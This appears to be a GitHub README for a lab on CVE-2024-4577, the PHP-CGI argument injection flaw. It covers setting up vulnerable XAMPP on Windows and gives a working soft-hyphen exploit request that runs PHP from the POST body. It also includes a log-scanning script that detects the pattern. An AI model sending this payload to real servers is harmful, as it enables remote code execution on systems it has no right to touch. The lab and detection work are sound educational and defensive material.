AlperenY-cs/CVE-2024-4577
CVE-2024-4577 - PHP-CGI Argument Injection RCE

CVE            Description                                CVSSv3
CVE-2024-4577  PHP-CGI Argument Injection Vulnerability   9.8

"CVE-2024-4577 is a critical argument injection vulnerability in PHP that can be exploited to achieve remote code execution (RCE). According to researchers at DEVCORE, this flaw is the result of errors in character encoding conversions, affecting the “Best Fit” feature on Windows."
-Tenable

Create lab for CVE-2024-4577

Download XAMPP

Download XAMPP (8.1.25 / PHP 8.1.25). After installing XAMPP, check the PHP version; it should be 8.1.25. The PHP version can be checked by running the "php -v" command from the command line. If that gives an error, the php directory must be added to the PATH variable.

Set Locale

The system locale must be changed. To do this, open Control Panel > Clock and Region > Region. Set the format to Japanese, Traditional Chinese, or Simplified Chinese. Then click Administrative > Change system locale and select the matching locale.

Configuring Apache

If PHP does not run in CGI mode, apply these settings.

  • Copy php.exe or php-cgi.exe to the /cgi/bin/ folder.
  • Add these lines to \xampp\apache\conf\httpd.conf ⬇️
ScriptAlias /php-cgi/ "C:/xampp/php/"
AddHandler application/x-httpd-php .php
Action application/x-httpd-php "/php-cgi/php-cgi.exe"
AddType application/x-httpd-php .php

<Directory "C:/xampp/php">
    Options +ExecCGI
    AllowOverride None
    Require all granted
</Directory>
  • Open httpd-xampp.conf and find the line LoadModule php_module "C:/xampp/php/php8apache2_4.dll". Put a '#' at the beginning of that line to comment it out.

Start Apache

Save the changes and start the Apache instance.

Exploitation

If the output of the PHP code sent in the body of the POST request below appears in the response, the exploitation step has succeeded.

POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{HOST}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
echo "vulnerable";
?>
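The request above works because the soft hyphen (0xAD) is not a literal '-' when php-cgi inspects the query string, yet the Windows "Best Fit" conversion turns it into '-' before the bytes reach argv. A defender can reuse that observation to hunt for the pattern in Apache access logs: decode the logged query to raw bytes, fold 0xAD to '-', and flag queries that then carry a php-cgi option together with the INI directives this lab abuses. The script below is an added example for this README, not part of the repository; the log lines it scans are constructed, and the IP addresses are documentation-range placeholders.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed Apache access-log sample (not taken from any real server).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2024:12:00:01 +0000] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 12
203.0.113.6 - - [10/Jun/2024:12:00:02 +0000] "GET /index.php?page=1 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Jun/2024:12:00:03 +0000] "GET /?-d+allow_url_include%3d1 HTTP/1.1" 400 0
203.0.113.8 - - [10/Jun/2024:12:00:04 +0000] "GET /?name=soft%ADhyphen HTTP/1.1" 200 33
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SOFT_HYPHEN = b"\xad"  # U+00AD; the Best Fit conversion maps it to ASCII '-' (0x2D)
INI_DIRECTIVES = (b"allow_url_include", b"auto_prepend_file")

def query_bytes(target: str) -> bytes:
    """Percent-decode the query part of a request target into raw bytes.
    0xAD alone is not valid UTF-8, so a text decode would replace it; bytes keep it."""
    if "?" not in target:
        return b""
    return unquote_to_bytes(target.split("?", 1)[1].replace("+", " "))

def php_cgi_options(target: str) -> list:
    """Return option-looking tokens ('-' plus a letter) after folding 0xAD to '-',
    i.e. what php-cgi would see in argv on an affected locale."""
    folded = query_bytes(target).replace(SOFT_HYPHEN, b"-")
    return [w for w in folded.split() if len(w) > 1 and w[:1] == b"-" and w[1:2].isalpha()]

def scan_access_log(text: str) -> list:
    """Flag lines whose query carries a php-cgi option and one of the INI directives."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        opts = php_cgi_options(m["target"])
        raw = query_bytes(m["target"])
        directives = [d.decode() for d in INI_DIRECTIVES if d in raw]
        if opts and directives:
            hits.append({"ip": m["ip"], "options": [o.decode("latin-1") for o in opts],
                         "directives": directives, "soft_hyphen": SOFT_HYPHEN in raw})
    return hits

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

The third sample line (a literal '-d') is flagged as well, so the same scan also covers the older CVE-2012-1823-style request, while the soft hyphen inside an ordinary parameter value is left alone.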

Disclaimer⚠️

This laboratory environment is intended solely for educational purposes and should not be used in live environments. I am not responsible for any damages or losses that may occur as a result of improper use. Users must utilize this environment at their own risk.
